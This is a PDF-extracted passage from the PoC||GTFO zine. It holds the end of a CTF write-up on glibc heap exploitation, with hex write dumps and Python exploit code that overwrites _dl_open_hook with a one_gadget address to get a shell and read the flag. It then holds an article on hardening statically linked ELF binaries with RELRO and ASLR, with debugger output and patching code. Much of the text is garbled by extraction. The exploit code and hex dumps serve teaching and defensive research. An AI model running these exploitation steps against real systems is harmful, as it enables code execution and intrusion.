[+] write 1: 560 a 6 e 8 4 c 3 7 0 75 61 61 61 76 61 61 61
11 560 a 6 e 8 4 c 3 2 0 61 61 61 61 62 61 61 61 18 77 61 61 61 78 61 61 61
01 04 00 00 00 00 00 00 560 a 6 e 8 4 c 3 8 0 51 d6 18 3 f 55 7 f 00 00
13 560 a 6 e 8 4 c 3 3 0 65 61 61 61 66 61 61 61 20 62 61 61 62 63 61 61 62
d0 22 46 3 f 55 7 f 00 00 560 a 6 e 8 4 c 3 9 0 64 61 61 62 65 61 61 62
15 560 a 6 e 8 4 c 3 4 0 69 61 61 61 6 a 61 61 61 22 66 61 61 62 67 61 61 62
c0 22 46 3 f 55 7 f 00 00 560 a 6 e 8 4 c 3 a 0 68 61 61 62 69 61 61 62
17 560 a 6 e 8 4 c 3 5 0 6d 61 61 61 6 e 61 61 61 24 6 a 61 61 62 6b 61 61 62
6 f 61 61 61 70 61 61 61 560 a 6 e 8 4 c 3 b 0 6 c 61 61 62 6d 61 61 62
19 560 a 6 e 8 4 c 3 6 0 71 61 61 61 72 61 61 61 26 6 e 61 61 62 6 f 61 61 62
73 61 61 61 74 61 61 61 560 a 6 e 8 4 c 3 c 0 70 61 61 62 71 61 61 62
21 560 a 6 e 8 4 c 3 7 0 75 61 61 61 76 61 61 61 28 72 61 61 62 73 61 61 62
77 61 61 61 78 61 61 61 560 a 6 e 8 4 c 3 d 0 74 61 61 62 75 61 61 62
23 560 a 6 e 8 4 c 3 8 0 79 61 61 61 7 a 61 61 62 30 76 61 61 62 77 61 61 62
11 04 00 00 00 00 00 00 560 a 6 e 8 4 c 3 e 0 78 61 61 62 79 61 61 62
25 560 a 6 e 8 4 c 3 9 0 64 61 61 62 65 61 61 62 32 ff ff ff ff ff ff ff ff
b0 c3 84 6 e 0 a 56 00 00 [ ∗ ] c a u s e an e x c e p t i o n − chunk i n u n s o r t e d
27 560 a 6 e 8 4 c 3 a 0 68 61 61 62 69 61 61 62 34 b i n with bad s i z e , t r i g g e r
6 a 61 61 62 6b 61 61 62 _dl_open_hook−>dlmode
29 560 a 6 e 8 4 c 3 b 0 6 c 61 61 62 6d 61 61 62 36 [+] a l l o c 3
11 03 00 00 00 00 00 00 [∗] flag :
31 560 a 6 e 8 4 c 3 c 0 70 61 61 62 71 61 61 62 38 34 C3_but_does_your_exploit_work_on_1710_too
e0 c3 84 6 e 0 a 56 00 00
33 [ + ] alloc 3

Voila!

35
1 ONE_GADGET = l i b c . a d d r e s s + 0 x f 1 6 5 1
i n f o ( " s e t _dl_open_hook−>dlmode = ONE_GADGET ({:# x } ) " . format (ONE_GADGET) )
3 i n f o ( " and make t h e n e x t chunk removed from t h e u n s o r t e d b i n t r i g g e r an e r r o r " )
w r i t e _ i t ( 1 , f i t ( m e r g e _ d i c t s ( {0 x60 :ONE_GADGET} ,
5 chunk ( b a s e=c o n t r o l l e d , o f f s e t =0xc0 , s i z e =−1) , ) ) ,
b a s e=c o n t r o l l e d )
7
i n f o ( """ c a u s e an e x c e p t i o n − chunk i n u n s o r t e d b i n w i t h bad s i z e ,
9 t r i g g e r _dl_open_hook−>dlmode """ )
alloc_it (3)
11
r . r e c v l i n e _ c o n t a i n s ( ’ m a l l o c ( ) : memory c o r r u p t i o n ’ )
13 r . s e n d l i n e ( ’ c a t f l a g ’ )
i n f o ( " f l a g : {} " . format ( r . r e c v l i n e ( ) ) )

Figure 16. This dumps the flag!

Closing Words
Glibc malloc’s insecurity is a never ending story.
The inline-metdata approach keeps presenting new
opportunities for exploiters. (Take a look at the new
tcache thing in version 2.26.) And even the old
ones, as we learned today, are not mitigated. They
are just there, floating around, waiting for any UAF
or overflow. Maybe it’s time to change the design of
libc altogether.
Another important lesson we learned is to al-
ways check the details. Reading the source or disas-
sembly yourself takes courage and persistence, but
fortune prefers the brave. Double check the mit-
igations. Re-read the old materials. Some things
that at the time were considered useless and forgot-
ten may prove valuable in different situations. The
past, like the future, holds many surprises.

36
18:06 RelroS: Read Only Relocations for Static ELF
by Ryan “ElfMaster” O’Neill

This paper is going to shed some insights into built this way.
the more obscure security weaknesses of statically Somewhere along the way came RELRO (read-
linked executables: the glibc initialization process, only relocations) a security mitigation technique
what the attack surface looks like, and why the secu- that has two modes: partial and full. By default
rity mitigation known as RELRO is as equally im- only the partial relro is enforced because full-relro
portant for static executables as it is for dynamic requires strict linking which has less efficient pro-
executables. We will discuss some solutions, and gram loading time due to the dynamic linker bind-
explore the experimental software that I have pre- ing/relocating immediately (strict) vs. lazy. but full
sented as a solution for enabling RELRO binaries RELRO can be very powerful for hardening the at-
that are statically linked, usually to avoid complex tack surface by marking specific areas in the data
dependecy issues. We will also take a look at ASLR, segment as read-only. Specifically the .init_array,
and innovate a solution for making it work on stat- .fini_array, .jcr, .got, .got.plt sections. The
ically linked executables. .got.plt section and .fini_array are the most fre-
quent targets for attackers since these contain func-
tion pointers into shared library routines and de-
Standard ELF Security Mitigations structor routines, respectively.
Over the years there have been some innovative and
progressive overhauls that have been incorporated
What about static linking?
into glibc, the linker, and the dynamic linker, in
order to make certain security mitigations possible. Developers like statically linked executables because
Firstly there was Pipacs who decided that making they are easier to manage, debug, and ship; every-
ELF programs that would otherwise be ET_EXEC thing is self contained. The chances of a user run-
(executables) could benefit from becoming ET_DYN ning into issues with a statically linked executable
objects, which are shared libraries. if a PT_INTERP are far less than with a dynamically linked exe-
segment is added to an ET_DYN object to specify an cutable which require dependencies, sometimes hun-
interpreter then ET_DYN objects can be linked as ex- dreds of them. I’ve been aware of this for some time,
ecutable programs which are position independent but I was remiss to think that statically linked ex-
executables, “-fPIC -pie” and linked with an ad- ecutables don’t suffer from the same ELF security
dress space that begins at 0x0. This type of exe- problems as dynamically linked executables! To my
cutable has no real absolute address space until it surprise, a statically linked executable is vulnera-
has been relocated into a randomized address space ble to many of the same attacks as a dynamically
by the kernel. A PIE executable uses IP relative linked executable, including shared library injection,
addressing mode so that it can avoid using absolute .dtors (.fini_array) poisoning, and PLT/GOT
addresses; consequently, a program that is an ELF poisoning.
ET_DYN can make full use of ASLR. This might surprise you; shouldn’t a static exe-
(ASLR can work with ET_EXEC’s with PaX using cutable be immune to relocation table tricks? Let’s
a technique called VMA mirroring,29 but I can’t say start with shared library injection. A shared library
for sure if its still supported and it was never the can be injected into the process address space us-
preferred method.) ing ptrace injected shellcode for malware purposes,
When an executable runs privileged, such as however if full RELRO is enabled coupled with PaX
sshd, it would ideally be compiled and linked into mprotect restrictions this becomes impossible since
a PIE executable which allows for runtime reloca- the PaX feature prevents the default behavior of al-
tion to a random address space, thus hardening the lowing ptrace to write to read-only segments and
attack surface into far more hostile playing grounds. full RELRO would ensure read-only protections on
Try running readelf -e /usr/sbin/sshd | the relevant data segment areas. Now, from an ex-
grep DYN and you will see that it is (most likely) ploitation standpoint this becomes more interest-
29 VMA Mirroring by PaX Team: unzip pocorgtfo18.pdf vmmirror.txt

37
ing when you realize that the PLT/GOT is still a namic segment flag since there are no dynamic seg-
thing in statically linked executables, and we will ments in statically linked executables. Let’s take a
discuss it shortly, but in the meantime just know lightweight tour through the init code of a statically
that the PLT/GOT contains function pointers to compiled executable.
libc routines. The .init_array/.fini_array func- From the output in Figure 17, you will notice
tion pointers respectively point to initialization and that there is a .got and .got.plt section within
destructor routines. Specifically .dtors has been the data segment, and to enable full RELRO these
used to achieve code execution in many types of ex- are normally merged into one section but for our
ploits, although I doubt its abuse is ubiquitous as purposes that is not necessary since the tool I de-
the .got.plt section itself. Let’s take a tour of signed ’relros’ marks both of them as read-only.
a statically linked executable and analyze the finer
points of the security mitigations–both present and
absent–that should be considered before choosing to Overview of Statically Linked ELF
statically link a program that is sensitive or runs
A high level overview can be seen with the ftrace
privileged.
tool, shown in Figure 18.31
Most of the heavy lifting that would normally
Demystifying the Ambiguous take place in the dynamic linker is performed by the
function generic_start_main() which in addition
The static binary in Figure 17 was to other tasks also performs various relocations and
built with full RELRO flags, gcc -static fixups to all the many sections in the data segment,
-Wl,-z,relro,-z,now. And even the savvy re- including the .got.plt section, in which case you
verser might be fooled into thinking that RELRO can setup a few watch points to observe that early
is in-fact enabled. partial-RELRO and full-RELRO on there is a function that inquires about CPU in-
are both incompatible with statically compiled bi- formation such as the CPU cache size, which allows
naries at this point in time, because the dynamic glibc to intelligently determine which version of a
linker is responsible for re-mapping and mprotecting given function, such as strcpy(), should be used.
the common attack points within the data segment, In Figure 19, we set watch points on the GOT
such as the PLT/GOT, and as shown in Figure 17 entries for several shared library routines and notice
there is no PT_INTERP to specify an interpreter nor that generic_start_main() serves, in some sense,
would we expect to see one in a statically linked much like a dynamic linker. Its job is largely to
binary. The default linker script is what directs perform relocations and fixups.
the linker to create the GNU_RELRO segment, even So in both cases the GOT entry for a given libc
though it serves no current purpose. function had its PLT stub address replaced with
Notice that the GNU_RELRO segment points to the most efficient version of the function given the
the beginning of the data segment which is usu- CPU cache size looked up by certain glibc init code
ally where you would want the dynamic linker to (i.e. __cache_sysconf()). Since this a somewhat
mprotect n bytes as read-only. however, we really high level overview I will not go into every function,
don’t want .tdata marked as read-only, as that will but the important thing is to see that the PLT/-
prevent multi-threaded applications from working. GOT is updated with a libc function, and can be
So this is just another indication that the stati- poisoned, especially since RELRO is not compati-
cally built binary does not actually have any plans ble with statically linked executables. This leads
to enable RELRO on itself. Alas, it really should, as us into the solution, or possible solutions, including
the PLT/GOT and other areas such as .fini_array our very own experimental prototype named relros,
are as vulnerable as ever. A common tool named which uses some ELF trickery to inject code that
checksec.sh uses the GNU_RELRO segment as one of is called by a trampoline that has been placed in
the markers to denote whether or not RELRO is a very specific spot. It is necessary to wait until
enabled on a binary,30 and in the case of statically generic_start_main() has finished all of its writes
compiled binaries it will report that partial-relro is to the memory areas that we intend to mark as read-
enabled, because it cannot find a DT_BIND_NOW dy- only before we invoke our enable_relro() routine.
30 unzip pocorgtfo18.pdf checksec.sh # http://www.trapkit.de/tools/checksec.html
31 git clone https://github.com/elfmaster/ftrace

38
$ g c c − s t a t i c −Wl,−z , r e l r o ,−z , now t e s t . c −o t e s t
$ r e a d e l f −l t e s t

E l f f i l e t y p e i s EXEC ( E x e c u t a b l e f i l e )
Entry p o i n t 0 x4008b0
There a r e 6 program h e a d e r s , s t a r t i n g a t o f f s e t 64

Program Headers :
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
LOAD 0 x0000000000000000 0 x0000000000400000 0 x0000000000400000
0 x00000000000cbf67 0 x00000000000cbf67 R E 200000
LOAD 0 x00000000000cceb8 0 x00000000006cceb8 0 x00000000006cceb8
0 x0000000000001cb8 0 x0000000000003570 RW 200000
NOTE 0 x0000000000000190 0 x0000000000400190 0 x0000000000400190
0 x0000000000000044 0 x0000000000000044 R 4
TLS 0 x00000000000cceb8 0 x00000000006cceb8 0 x00000000006cceb8
0 x0000000000000020 0 x0000000000000050 R 8
GNU_STACK 0 x0000000000000000 0 x0000000000000000 0 x0000000000000000
0 x0000000000000000 0 x0000000000000000 RW 10
GNU_RELRO 0 x00000000000cceb8 0 x00000000006cceb8 0 x00000000006cceb8
0 x0000000000000148 0 x0000000000000148 R 1

S e c t i o n t o Segment mapping :
Segment S e c t i o n s . . .
00 . n o t e . ABI−t a g . n o t e . gnu . b u i l d −i d . r e l a . p l t . i n i t . p l t . t e x t _ _ l i b c _ f r e e r e s _ f n
__libc_thread_freeres_fn . f i n i . rodata __libc_subfreeres __libc_atexit
. s t a p s d t . b a s e _ _ l i b c _ t h r e a d _ s u b f r e e r e s . eh_frame . g c c _ e x c e p t _ t a b l e
01 . t d a t a . i n i t _ a r r a y . f i n i _ a r r a y . j c r . data . r e l . r o . g o t . g o t . p l t . data . b s s
__libc_freeres_ptrs
02 . n o t e . ABI−t a g . n o t e . gnu . b u i l d −i d
03 . tdata . tbss
04
05 . t d a t a . i n i t _ a r r a y . f i n i _ a r r a y . j c r . data . r e l . r o . g o t

Figure 17. RELRO is Broken for Static Executables

$ f t r a c e test_binary
LOCAL_call@0x404fd0 : __libc_start_main ( )
LOCAL_call@0x404f60 : get_common_indeces . c o n s t p r o p . 1 ( )
(RETURN VALUE) LOCAL_call@0x404f60 : get_common_indeces . c o n s t p r o p . 1 ( ) = 3
LOCAL_call@0x404cc0 : g e n e r i c _ s t a r t _ m a i n ( )
LOCAL_call@0x447cb0 : _dl_aux_init ( ) (RETURN VALUE) LOCAL_call@0x447cb0 :
_dl_aux_init ( ) = 7 f f e c 5 3 6 0 b f 9
LOCAL_call@0x4490b0 : _ d l _ d i s c o v e r _ o s v e r s i o n ( 0 x 7 f f e c 5 3 6 0 b e 8 )
LOCAL_call@0x46f5e0 : uname ( ) LOCAL_call@0x46f5e0 : __uname ( )
<t r u n c a t e d >

Figure 18. FTracing a Static ELF

39
( gdb ) x/ gx 0 x6d0018 /∗ . g o t . p l t e n t r y f o r s t r c p y ∗/
0 x6d0018 : 0 x 0 0 0 0 0 0 0 0 0 0 4 3 f 6 0 0
( gdb ) watch ∗0 x6d0018
Hardware w a t c h p o i n t 3 : ∗0 x6d0018
( gdb ) x/ gx /∗ . g o t . p l t e n t r y f o r memmove ∗/
0 x6d0020 : 0 x0000000000436da0
( gdb ) watch ∗0 x6d0020
Hardware w a t c h p o i n t 4 : ∗0 x6d0020
( gdb ) run
The program b e i n g debugged has been s t a r t e d a l r e a d y .
S t a r t i t from t h e b e g i n n i n g ? ( y o r n ) y
S t a r t i n g program : /home/ e l f m a s t e r / g i t / l i b e l f m a s t e r / examples / s t a t i c _ b i n a r y

Hardware w a t c h p o i n t 4 : ∗0 x6d0020

Old v a l u e = 4195078
New v a l u e = 4418976
0 x0000000000404dd3 i n g e n e r i c _ s t a r t _ m a i n ( )
( gdb ) x/ i 0 x436da0
0 x436da0 <__memmove_avx_unaligned>: mov %r d i ,% r a x
( gdb ) c
Continuing .

Hardware w a t c h p o i n t 3 : ∗0 x6d0018

Old v a l u e = 4195062
New v a l u e = 4453888
0 x0000000000404dd3 i n g e n e r i c _ s t a r t _ m a i n ( )
( gdb ) x/ i 0 x 4 3 f 6 0 0
0 x 4 3 f 6 0 0 <__strcpy_sse2_unaligned >: mov %r s i ,% r c x
( gdb )

Figure 19. Exploring a Static ELF with GDB

40
A Second Implementation ing subsequent instructions. Nonetheless this is the
prototype we are stuck with until I have time to
My first prototype had to be written quickly due to make some changes.
time constraints. This current implementation uses –——– ——— —–—–
an injection technique that marks the PT_NOTE pro- So let’s take a look at this RelroS application.32
gram header as PT_LOAD, and we therefore create a 33
First we see that this is not a dynamically linked
second text segment effectively. executable.
In the generic_start_main() function (Fig-
$ r e a d e l f −d t e s t
ure 20) there is a very specific place that we must There i s no dynamic s e c t i o n i n t h i s file .
patch and it requires exactly a five byte patch. (call
<imm>.) As immediate calls do not work when trans-
ferring execution to a different segment, an lcall We observe that there is only a r+x text seg-
(far call) is needed which is considerably more than ment, and a r+w data segment, with a lack of read-
five bytes. The solution to this is to switch to a only memory protections on the first part of the data
reverse text infection which will keep the enable_- segment.
relro() code within the one and only code segment.
$ ./ test &
Currently though we are being crude and patching [ 1 ] 27891
the code that calls main(). $ c a t / p r o c / ‘ p i d o f t e s t ‘ / maps
Currently we are overwriting six bytes at 00400000 −004 c c 0 0 0 r−xp 00000000 f d : 0 1
0x405b54 with a push $enable_relro; ret set 4856460 /home/ e l f m a s t e r / t e s t
006 cc000 −006 c f 0 0 0 rw−p 000 c c 0 0 0 f d : 0 1
of instructions, shown in Figure 21. Our 4856460 /home/ e l f m a s t e r / t e s t
enable_relro() function mprotects the part of the ...
data segment denoted by PT_RELRO as read-only,
then calls main(), then sys_exits. This is flawed
since none of the deinitilization routines get called. We apply RelroS to the executable with a single
So what is the solution? command.
Like I mentioned earlier, we keep the $ ./ relros ./ test
enable_relro() code within the main programs i n j e c t i o n s i z e : 464
text segment using a reverse text extension, or a text main ( ) : 0 x400b23
padding infection. We could then simply overwrite
the five bytes at 0x405b46 with a call <offset>
to enable_relro() and then that function would We observe that read-only relocations have been
make sure we return the address of main() which enforced by our patch that we instrumented into the
would obviously be stored in %rax. This is perfect binary called test.
since the next instruction is callq *%rax, which $ ./ test &
would call main() right after RELRO has been en- [ 1 ] 28052
$ c a t / p r o c / ‘ p i d o f t e s t ‘ / maps
abled, and no instructions are thrown out of align-
00400000 −004 c c 0 0 0 r−xp 00000000 f d : 0 1
ment. So that is the ideal solution, although it 10486089 /home/ e l f m a s t e r / t e s t
doesn’t yet handle the problem of .tdata being 006 cc000 −006 cd000 r−−p 000 c c 0 0 0 f d : 0 1
at the beginning of the data segment, which is a 10486089 /home/ e l f m a s t e r / t e s t
006 cd000 −006 c f 0 0 0 rw−p 000 cd000 f d : 0 1
problem for us since we can only use mprotect on 10486089 /home/ e l f m a s t e r / t e s t
memory areas that are multiples of a PAGE_SIZE. ...
A more sophisticated set of steps must be taken
in order to get multi-threaded applications working
with RELRO using binary instrumentation. Other Notice after we applied relros on ./test, it now
solutions might use linker scripts to put the thread has a 4096 area in the data segment that has been
data and bss into their own data segment. marked as read-only. This is what the dynamically
Notice how we patch the instruction bytes start- linker accomplishes for dynamically linked executa-
ing at 0x405b4f with a push/ret sequence, corrupt- bles.
32 Please note that it uses libelfmaster which is not officially released yet. The use of this library is minimal, but you will

need to rewrite those portions if you intend to run the code.


33 unzip pocorgtfo18.pdf relros.c

41
405 b46 : 48 8b 74 24 10 mov 0 x10(% r s p ) ,% r s i
405 b4b : 8b 7c 24 0 c mov 0 xc(% r s p ) ,% e d i
405 b 4 f : 48 8b 44 24 18 mov 0 x18(% r s p ) ,% r a x /∗ s t o r e main ( ) addr ∗/
405 b54 : ff d0 callq ∗%r a x /∗ c a l l main ( ) ∗/
405 b56 : 89 c7 mov %eax ,% e d i
405 b58 : e8 b3 de 00 00 callq 413 a10 <e x i t >

Figure 20. Unpatched generic_start_main().

405 b46 : 48 8b 74 24 10 mov 0 x10(% r s p ) ,% r s i


405 b4b : 8b 7 c 24 0 c mov 0 xc(% r s p ) ,% e d i
405 b 4 f : 48 8b 44 24 18 mov 0 x18(% r s p ) ,% r a x
405 b54 : 68 f 4 c6 0 f 0 c pushq $ 0 x c 0 f c 6 f 4
405 b59 : c3 retq
/∗
∗ The f o l l o w i n g bad i n s t r u c t i o n s a r e n e v e r c r a s h e d on b e c a u s e
∗ t h e p r e v i o u s i n s t r u c t i o n r e t u r n s i n t o e n a b l e _ r e l r o ( ) which c a l l s
∗ main ( ) on b e h a l f o f t h i s f u n c t i o n , and t h e n s y s _ e x i t ’ s o u t .
∗/
405 b5a : de 00 f i a d d (%r a x )
405 b5c : 00 39 add %bh ,(% r c x )
405 b5e : c2 0 f 86 retq $0x860f
405 b61 : fb sti
405 b62 : fe ( bad )
405 b63 : ff ( bad )
405 b64 : ff ( bad )

Figure 21. Patched generic_start_main().

42
–——– ——— —–—– ASLR Solutions
So what are some other potential solutions for
I haven’t personally spent enough time with the
enabling RELRO on statically linked executables?
linker to see if it can be tweaked to link a static
Aside from my binary instrumentation project that
executable that comes out as an ET_DYN object,
will improve in the future, this might be fixed either
which should also not have a PT_INTERP segment
by tricky linker scripts or by the glibc developers.
since it is not dynamically linked. A quick peak in
Write a linker script that places .tbss, src/linux/fs/binfmt_elf.c, shown in Figure 22,
.tdata, and .data in their own segment and will show that the executable type must be ET_DYN.
the sections that you want readonly should be
placed in another segment, these sections include
.init_array, .fini_array, .jcr, .dynamic, .got, A Hybrid Solution
and .got.plt. Both of these PT_LOAD segments will The linker may not be able to perform this task yet,
be marked as PF_R|PF_W (read+write), and serve as but I believe we can. A potential solution exists
two separate data segments. A program can then in the idea that we can at least compile a stati-
have a custom function–but not a constructor–that cally linked executable so that it uses position in-
is called by main() before it even checks argc and dependent code (IP relative), although it will still
argv. The reason we don’t want a constructor func- maintain an absolute address space. So here is the
tion is because it will attempt to mprotect read- algorithm as follows from a binary instrumentation
only permissions on the second data segment before standpoint.
the glibc init code has finished performing its fixups First we’ll compile the executable with
which require write access. This is because the con- -static -fPIC, then static_to_dyn.c ad-
structor routines stored in .init section are called justs the executable. First it changes the
before the write instructions to the .got, .got.plt ehdr->e_type from ET_EXEC to ET_DYN. It then
sections, etc. modifies the phdrs for each PT_LOAD segment,
The glibc developers should probably add a setting phdr[TEXT].p_vaddr and .p_offset
function that is invoked by generic_start_main() to zero, phdr[DATA].p_vaddr to 0x200000 +
right before main() is called. You will notice there phdr[DATA].p_offset. It sets ehdr->e_entry to
is a _dl_protect_relro() function in statically ehdr->e_entry - old_base. Finally, it updates
linked executables that is never called. each section header to reflect the new address range,
so that GDB and objdump can work with the bi-
nary.
ASLR Issues $ g c c − s t a t i c −fPIC t e s t 2 . c −o t e s t 2
$ . / static_to_dyn . / t e s t 2
ASLR requires that an executable is ET_DYN unless S e t t i n g e_entry t o 8 b0
VMA mirroring is used for ET_EXEC ASLR. A stat- $ ./ test2
ically linked executable can only be linked as an S e g m e n t a t i o n f a u l t ( c o r e dumped )
ET_EXEC type executable.
$ g c c − s t a t i c −fPIC −p i e t e s t 2 . c −o t e s t 2 Alas, a quick look at the binary with objdump
l d : x86_64−l i n u x −gnu /5/ c r t b e g i n T . o :
r e l o c a t i o n R_X86_64_32 a g a i n s t ‘__TMC_END__’ will prove that most of the code is not using IP rel-
can not be used when making a s h a r e d o b j e c t ; ative addressing and is not truly PIC. The PIC ver-
r e c o m p i l e with −fPIC sion of the glibc init routines like _start lives in
x86_64−l i n u x −gnu /5/ c r t b e g i n T . o : e r r o r a dd in g
/usr/lib/X86_64-linux-gnu/Scrt1.o, so we may
symbols : Bad v a l u e
c o l l e c t 2 : error : ld returned 1 exit status have to start thinking outside the box a bit about
what a statically linked executable really is. That is,
we might take the -static flag out of the equation
and begin working from scratch!
This means that you can remove the -pie flag Perhaps test2.c should have both a
and end up with an executable that uses position _start() and a main(), as shown in Figure 23.
independent code. But it does not have an address _start() should have no code in it and use
space layout that begins with base address 0, which __attribute__((weak)) so that the _start() rou-
is what we need. So what to do? tine in Scrt1.o can override it. Or we can compile

43
916 } e l s e i f ( l o c −>e l f _ e x . e_type == ET_DYN) {
/∗ Try and g e t dynamic programs o u t o f t h e way o f t h e
918 ∗ d e f a u l t mmap base , as w e l l as w h a t e v e r program t h e y
∗ might t r y t o e x e c . This i s b e c a u s e t h e b r k w i l l
920 ∗ f o l l o w t h e l o a d e r , and i s n o t movable . ∗/
l o a d _ b i a s = ELF_ET_DYN_BASE − vaddr ;
922 i f ( c u r r e n t −>f l a g s & PF_RANDOMIZE)
l o a d _ b i a s += arch_mmap_rnd ( ) ;

if ( ! load_addr_set ) {
942 load_addr_set = 1 ;
load_addr = ( e l f _p p n t −>p_vaddr − e lf _ p pn t −>p _ o f f s e t ) ;
944 i f ( l o c −>e l f _ e x . e_type == ET_DYN) {
l o a d _ b i a s += e r r o r −
946 ELF_PAGESTART( l o a d _ b i a s + vaddr ) ;
load_addr += l o a d _ b i a s ;
948 reloc_func_desc = load_bias ;
}
950 }

Figure 22. src/linux/fs/binfmt_elf.c

Diet Libc34 with IP relative addressing, using it


$ . / static_to_dyn t e s t 2
instead of glibc for simplicity. There are multi- $ . / t e s t 2 arg1
ple possibilities, but the primary idea is to start
thinking outside of the box. So for the sake of a $ pmap ‘ p i d o f t e s t 2 ‘
PoC here is a program that simply does nothing 17622: . / t e s t 2 arg1
0000565271 e 41 00 0 4K r−x−− t e s t 2
but check if argc is larger than one and then incre- 0000565272042000 4K rw−−− t e s t 2
ments a variable in a loop every other iteration. We 00007 f f c 2 8 f d a 0 0 0 132K rw−−− [ stack ]
will demonstrate how ASLR works on it. It uses 00007 f f c 2 8 f f c 0 0 0 8K r−−−− [ anon ]
_start() as its main(), and the compiler options 00007 f f c 2 8 f f e 0 0 0 8K r−x−− [ anon ]
ffffffffff600000 4K r−x−− [ anon ]
will be shown below. total 160K
$ g c c −n o s t d l i b −fPIC t e s t 2 . c −o t e s t 2
$ . / t e s t 2 arg1

$ pmap ‘ p i d o f t e s t 2 ‘ Now notice that the text and data segments for
17370: . / t e s t 2 arg1 test2 are mapped to a random address space. Now
0000000000400000 4K r−x−− t e s t 2 we are talking! The rest of the homework should be
0000000000601000 4K rw−−− t e s t 2 fairly straight forward. Extrapolate upon this work
00007 f f c e f c c a 0 0 0 132K rw−−− [ stack ]
00007 f f c e f d 2 0 0 0 0 8K r−−−− [ anon ] and find more creative solutions until the GNU folks
00007 f f c e f d 2 2 0 0 0 8K r−x−− [ anon ] have the time to address the issues with some more
ffffffffff600000 4K r−x−− [ anon ] elegance than what we can do using trickery and
total 160K
instrumentation.
$

ASLR is not present, and the address space is


just as expected on a 64 class ELF binary in Linux.
So let’s run static_to_dyn.c on it, and then try
again.
34 unzip pocorgtfo18.pdf dietlibc.tar.bz2

44
1 /∗ Make s u r e we have a d a t a segment f o r t e s t i n g p u r p o s e s ∗/
s t a t i c i n t test_dummy = 5 ;
3
int _start ( ) {
5 int argc ;
long ∗ a r g s ;
7 long ∗ rbp ;
int i ;
9 int j = 0 ;

11 /∗ E x t r a c t a r g c from s t a c k ∗/
asm __volatile__ ( "mov 8(%%rbp ) , %%r c x " : "=c " ( a r g c ) ) ;
13
/∗ E x t r a c t a r g v from s t a c k ∗/
15 asm __volatile__ ( " l e a 16(%%rbp ) , %%r c x " : "=c " ( a r g s ) ) ;

17 i f ( argc > 2) {
f o r ( i = 0 ; i < 1 0 0 0 0 0 0 0 0 0 0 0 ; i ++)
19 i f ( i % 2 == 0 )
j ++;
21 }
return 0 ;
23 }

Figure 23. First Draft of test2.c

Improving Static Linking Techniques Now we can run static_to_dyn from Figure 25
to enforce ASLR.36 The first two sections are hap-
Since we are compiling statically by simply cutting
pily randomized!
glibc out of the equation with the -nostdlib com-
piler flag, we must consider that things we take for $ . / static_to_dyn t e s t 2
granted, such as TLS and system call wrappers, $ . / t e s t 2 f o o bar
$ pmap ‘ p i d o f t e s t ‘
must be manually coded and linked. One potential 24411: . / t e s t 2 f o o bar
solution I mentioned earlier is to compile dietlibc 0000564 c f 5 4 2 f 0 0 0 8K r−x−− t e s t 2
with IP relative addressing mode, and simply link 0000564 c f 5 6 3 1 0 0 0 4K rw−−− t e s t 2
00007 f f e 9 8 c 8 e 0 0 0 132K rw−−− [ stack ]
your code to it with -nostdlib. Figure 24 is an up-
00007 f f e 9 8 d 5 5 0 0 0 8K r−−−− [ anon ]
dated version of test2.c which prints the command 00007 f f e 9 8 d 5 7 0 0 0 8K r−x−− [ anon ]
line arguments. ffffffffff600000 4K r−x−− [ anon ]
Now we are actually building a statically linked total 164K
binary that can get command line args, and call stat-
ically linked in functions from Diet Libc.35
$ g c c −n o s t d l i b −c −fPIC t e s t 2 . c −o t e s t 2 . o
$ g c c −n o s t d l i b t e s t 2 . o \
/ u s r / l i b / d i e t / l i b −x86_64/ l i b c . a −o t e s t 2
$ . / t e s t 2 arg1 arg2
./ test2
arg1
arg2
$

35 Note that first I downloaded the dietlibc source code and edited the Makefile to use the -fPIC flag which will enforce

IP-relative addressing within dietlibc.


36 unzip pocorgtfo18.pdf static_to_dyn.c

45
#include <s t d i o . h>
2
/∗ Make s u r e we have a d a t a segment f o r t e s t i n g p u r p o s e s ∗/
4 s t a t i c i n t test_dummy = 5 ;

6 int _start ( ) {
int argc ;
8 long ∗ a r g s ;
long ∗ rbp ;
10 int i ;
int j = 0 ;
12
/∗ E x t r a c t a r g c from s t a c k ∗/
14 asm __volatile__ ( "mov 8(%%rbp ) , %%r c x " : "=c " ( a r g c ) ) ;

16 /∗ E x t r a c t a r g v from s t a c k ∗/
asm __volatile__ ( " l e a 16(%%rbp ) , %%r c x " : "=c " ( a r g s ) ) ;
18
f o r ( i = 0 ; i < a r g c ; i ++) {
20 s l e e p ( 1 0 ) ; /∗ l o n g enough f o r us t o v e r i f y ASLR ∗/
p r i n t f ( "%s \n" , a r g s [ i ] ) ;
22 }
exit (0) ;
24 }

Figure 24. Updated test2.c.

Summary
In this paper we have cleared some misconceptions
surrounding the attack surface of a statically linked
executable, and which security mitigations are lack-
ing by default. PLT/GOT attacks do exist against
statically linked ELF executables, but RELRO and
ASLR defenses do not.
We presented a prototype tool for enabling full
RELRO on statically linked executables. We also
engaged in some work to create a hybridized ap-
proach between linking techniques with instrumen-
tation, and together were able to propose a solution
for making static binaries that work with ASLR.
Our solution for ASLR is to first build the binary
statically, without glibc.

46
1 #d e f i n e _GNU_SOURCE
#i n c l u d e < s t d i o . h>
3 #i n c l u d e < s t d l i b . h>
#i n c l u d e < e l f . h>
5 #i n c l u d e <s y s / t y p e s . h>
#i n c l u d e <s e a r c h . h>
7 #i n c l u d e <s y s / t i m e . h>
#i n c l u d e < f c n t l . h>
9 #i n c l u d e < l i n k . h>
#i n c l u d e <s y s / s t a t . h>
11 #i n c l u d e <s y s /mman . h>

13 #d e f i n e HUGE_PAGE 0 x 2 0 0 0 0 0

15 i n t main ( i n t a r g c , char ∗∗ a r g v ) {
ElfW ( Ehdr ) ∗ e h d r ;
17 ElfW ( Phdr ) ∗ phdr ;
ElfW ( Shdr ) ∗ s h d r ;
19 u i n t 8 _ t ∗mem ;
int fd ;
21 int i ;
struct s t a t s t ;
23 u i n t 6 4 _ t o l d _ b a s e ; /∗ o r i g i n a l t e x t base ∗/
u i n t 6 4 _ t new_data_base ; /∗ new d a t a base ∗/
25 char ∗ S t r i n g T a b l e ;

27 f d = open ( a r g v [ 1 ] , O_RDWR) ;
i f ( fd < 0) {
29 p e r r o r ( " open " ) ;
goto f a i l ;
31 }

33 f s t a t ( f d , &s t ) ;

35 mem = mmap(NULL, s t . s t _ s i z e , PROT_READ|PROT_WRITE, MAP_SHARED, fd , 0) ;


i f (mem == MAP_FAILED ) {
37 p e r r o r ( "mmap" ) ;
goto f a i l ;
39 }

